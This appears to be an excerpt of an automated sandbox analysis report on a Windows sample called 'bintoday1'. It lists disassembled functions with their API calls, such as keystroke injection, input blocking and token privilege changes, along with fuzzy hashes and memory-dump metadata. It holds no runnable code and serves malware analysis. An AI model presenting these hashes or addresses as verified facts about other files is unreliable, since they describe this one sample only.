Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: d727b36425ecbe8f4abc5820c824c25e4f7df048efddeabbaebf7387e7c8384c
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: B9020C71E001199FDF14CFA9C8806EEFBF1EF58314F2581AAD819EB384D771A9458B94

Function 00C068EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C06918
FindClose.KERNEL32(00000000), ref: 00C06961

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 86ad5b7fa49f3436b8cdffc021969782d3fe918dafac40e9b09abbd50133baeb
Instruction ID: 8c11ae4de6527596ba1bb1a023ed843ed1d34c899746a4d45a700e4904ad61f0
Opcode Fuzzy Hash: 86ad5b7fa49f3436b8cdffc021969782d3fe918dafac40e9b09abbd50133baeb
Instruction Fuzzy Hash: EA118E316142019FC710DF29D484B1ABBE5EF85328F15C6A9E4698F6A2CB30EC05CB91

Function 00C037B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C14891,?,?,00000035,?), ref: 00C037E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C14891,?,?,00000035,?), ref: 00C037F4

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 51f1d3f71adc382e19a70f7b37b4084fa7e4aa2ccf09776027fae6bcd7da460f
Instruction ID: 00c3342553f07cecfebead8fb74bfdae5063483245a93447a6e394bcb576b0c6
Opcode Fuzzy Hash: 51f1d3f71adc382e19a70f7b37b4084fa7e4aa2ccf09776027fae6bcd7da460f
Instruction Fuzzy Hash: 2BF0E5B06042286AEB2057BA8C8DFEF7AAEEFC8761F000275F509D22D1D9609944C6B0

Function 00BFB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BFB25D
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00BFB270

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 173d0fabb46660974fa45c9739727f78934a54c1f16e467f955b4afaa5b1f03a
Instruction ID: 8020bd9e7d73eef41df7f99ab80cfac5c501663c679ab47013233c8c2e3b8bc5
Opcode Fuzzy Hash: 173d0fabb46660974fa45c9739727f78934a54c1f16e467f955b4afaa5b1f03a
Instruction Fuzzy Hash: 5CF01D7181424DABDF159FA0C845BBE7FB4FF04305F108059F955A6191C379C6159F94

Function 00BF10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BF11FC), ref: 00BF10D4
CloseHandle.KERNEL32(?,?,00BF11FC), ref: 00BF10E9

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 86067e7c92c389f1f6ee680bac3e926ba6a89d8077cead03b06fcb36785ac647
Instruction ID: 830350ba43b7c40c7e0c7f309069c43daa435e39d7b72e856b3305ee28deb0f6
Opcode Fuzzy Hash: 86067e7c92c389f1f6ee680bac3e926ba6a89d8077cead03b06fcb36785ac647
Instruction Fuzzy Hash: 85E04F32018601EEE7352B61FC05FBB77E9EB04320B20886EF5A5814B1DB626CA1DB54

Function 00B9CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00BE0C40

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: fb9c2c1219406deec377b2a93f71e1214f07dceb242dc93046ccd1880feffdcf
Instruction ID: f20c4577eda19b3cd957e84a7cb6c24c54f511c4503fbf7cbf9f440d7122aecd
Opcode Fuzzy Hash: fb9c2c1219406deec377b2a93f71e1214f07dceb242dc93046ccd1880feffdcf
Instruction Fuzzy Hash: 7F326A709102189BCF14EF90D995BEDBBF5FF05304F6480B9E806AB292D775AE49CB60

Function 00BC676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BC6766,?,?,00000008,?,?,00BCFEFE,00000000), ref: 00BC6998

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f2e063475fc78b754e536b299459917d125975eae510ba6e08e7526d6850a6a2
Instruction ID: 7546c84369e80498800b0c83ddb04a8778c425c66bdc4c5a4e59c269f8d02ccd
Opcode Fuzzy Hash: f2e063475fc78b754e536b299459917d125975eae510ba6e08e7526d6850a6a2
Instruction Fuzzy Hash: F2B129316106099FD719CF28C48AF657BE0FF49364F25869DE89ACF2A2C735E991CB40

Function 00BAB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00BE851F

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 08aa7f3188888b76397cea8b86629aaf45897e6fc1ecb2979474cd6aa3e2120a
Instruction ID: 3892c1eccc86f13c6e30fbf418e59f818f5f6e537411976f45da434c0fbd7e44
Opcode Fuzzy Hash: 08aa7f3188888b76397cea8b86629aaf45897e6fc1ecb2979474cd6aa3e2120a
Instruction Fuzzy Hash: 441260719046299FCB14CF59C880AEEB7F5FF49710F1481AAE859EB252DB309E81CF90

Function 00C0EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C0EABD

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 30d567fd71c426645236f20d1b0c8f573f4b426578fc330c905bf1763b6cbd66
Instruction ID: d4e79823d86d8b4f9c86c52b5676a9af10fc951c8e301837b6fb96d0eab5f5a2
Opcode Fuzzy Hash: 30d567fd71c426645236f20d1b0c8f573f4b426578fc330c905bf1763b6cbd66
Instruction Fuzzy Hash: 86E04F323102049FC710EF5AD844E9AFBE9AF98760F01846AFC49C73A1DB70E841CBA0

Function 00BB09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00BB03EE), ref: 00BB09DA

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c152ac2ad09c581ff45f713776ea9ee2ce565c702e752d12e85ba31751d56ea6
Instruction ID: af833f6f3f1922a45162f2aa935bc1d155bb51f107208c2b274d37eff9f7c43f
Opcode Fuzzy Hash: c152ac2ad09c581ff45f713776ea9ee2ce565c702e752d12e85ba31751d56ea6
Instruction Fuzzy Hash:

Function 00BB781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00BB798B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: e65e674b17472d443a00f1c5b018174ab8221d1bec4dedbbd8e8d22793b15326
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 875134616CC6056BDB38896A8C9EBFE23D9DBD2340F1805C9D8C6D7282CED5DE01D356

Function 00BC6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b21575775a831e4f663d02c85bda6ab922901210b2dfa008131726931b0f296c
Instruction ID: 1db6e9efd6ff72ab8b70766b9c8a5bdd60f650c195c2287b7d205bc2e3747398
Opcode Fuzzy Hash: b21575775a831e4f663d02c85bda6ab922901210b2dfa008131726931b0f296c
Instruction Fuzzy Hash: 66322231E79F014DDB239634D822339A689AFB73D5F15D73BE81AB5AA5EF29C4834100

Function 00BACC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4405103641a43a269ceb68236f7fbcbcadf12cc32158c8f259c454aaa7dc2d7b
Instruction ID: 8e6fec4ad74340f6bfb0aa5c2f958a7b5410de8ffe18d15866e7b0f9e11a3e7b
Opcode Fuzzy Hash: 4405103641a43a269ceb68236f7fbcbcadf12cc32158c8f259c454aaa7dc2d7b
Instruction Fuzzy Hash: 2832F831A081958FDF24CF2AC4D467D7FE1EB46310F2885EAD45A9B296E730DD82DB81

Function 00B97920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf7bd4ae9054259e72006246bd679dadc7366fc01b88c561b1e7a0b0d01dcd09
Instruction ID: ebd070070c8159120076428b0aeed97cb6cd81861b8ea940ae76cf25913e8d8b
Opcode Fuzzy Hash: cf7bd4ae9054259e72006246bd679dadc7366fc01b88c561b1e7a0b0d01dcd09
Instruction Fuzzy Hash: B8229E70A0460ADFDF14CFA8D881AAEB7F5FF44310F2045BAE816A7391EB35A955CB50

Function 00B991C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4ed539246592aef2616795788dab4930049fc7596ba8405148059a51590c1e3
Instruction ID: ca4d3484e0b66ba920fca002b25458f568baf2fcd81323b18e542d883466a0c4
Opcode Fuzzy Hash: d4ed539246592aef2616795788dab4930049fc7596ba8405148059a51590c1e3
Instruction Fuzzy Hash: 540297B0E1020AEBDF05EF54D881AADB7F1FF44340F5181A9E4169B391EB31EA51CB95

Function 00BC9EEE Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14760ce7d97bbe591f305e598b4c37113db38e0c38bc054f431485ed25175e8
Instruction ID: c1b8e5153d041f7e91feacc2250589b8934b783499e9becd7f495d5b4e1b40c8
Opcode Fuzzy Hash: d14760ce7d97bbe591f305e598b4c37113db38e0c38bc054f431485ed25175e8
Instruction Fuzzy Hash: A0B1D030D3AF814DD2639639887133AB69CAFBB6D5B91D71BFC1674D62EB2185834140

Function 00BB7A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2414415b84f4bd876da58afe988809b18cd91a7f88bff69b677819e1b1a71951
Instruction ID: 1145b891edeb8cc98dc95a2d3a039ffd26e893c4fe540c971928793b6343a8ce
Opcode Fuzzy Hash: 2414415b84f4bd876da58afe988809b18cd91a7f88bff69b677819e1b1a71951
Instruction Fuzzy Hash: F06137612C870967DE749A2889B5BFE23D8DFC1700F1409D9E882DB2D1DED19E42CB55

Function 00BB7CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6cd041076b6fb907a7785937c9366edef88044abbb9c19dcf4fefcd1be3215b
Instruction ID: becbd74bda32b594fdc7c24306f43346ca7a460143bf0970889bc263dfc01cbe
Opcode Fuzzy Hash: b6cd041076b6fb907a7785937c9366edef88044abbb9c19dcf4fefcd1be3215b
Instruction Fuzzy Hash: A96138B16C870957DA389A2888A5BFE23DCDFC2780F1409E9E943DF681DED2DD42C255

Function 033435D0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: ebefd6f2494ecd7745ebc20a1a45a2b370550ed59b312581ddd517bb431443b6
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8041C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB40

Function 00C02046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59064366cf13993a79fe67cf019fd756fe1d93f4d3a38316fcb0d2d5f393a610
Instruction ID: 5a4719893af63d450857615c38777f39f3aa57385bde36c2f1850b78d2640d72
Opcode Fuzzy Hash: 59064366cf13993a79fe67cf019fd756fe1d93f4d3a38316fcb0d2d5f393a610
Instruction Fuzzy Hash: 6921A5326206118BDB38CE79C82677E73E9A754314F15862EE4A7C37D0DE75E904CB80

Function 03343460 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 198995d31c2b783e466688bcc84883964e1dc667147e97710ad0578634ce6ef7
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 0A018078A00209EFCB49DF98D5909AEF7F9FF48220B248599D809A7741E730AE51DB80

Function 033434C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 50798b4c0771b53454d671043935c46cf9f7d650b1ee25368bc607e9456a2c9e
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 65018078A01209EFCB45DF98C5909AEF7F5FB48220B248599D809A7741E731AE51DB80

Function 03341E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189549780.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3340000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00C12ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C12B30
DeleteObject.GDI32(00000000), ref: 00C12B43
DestroyWindow.USER32 ref: 00C12B52
GetDesktopWindow.USER32 ref: 00C12B6D
GetWindowRect.USER32(00000000), ref: 00C12B74
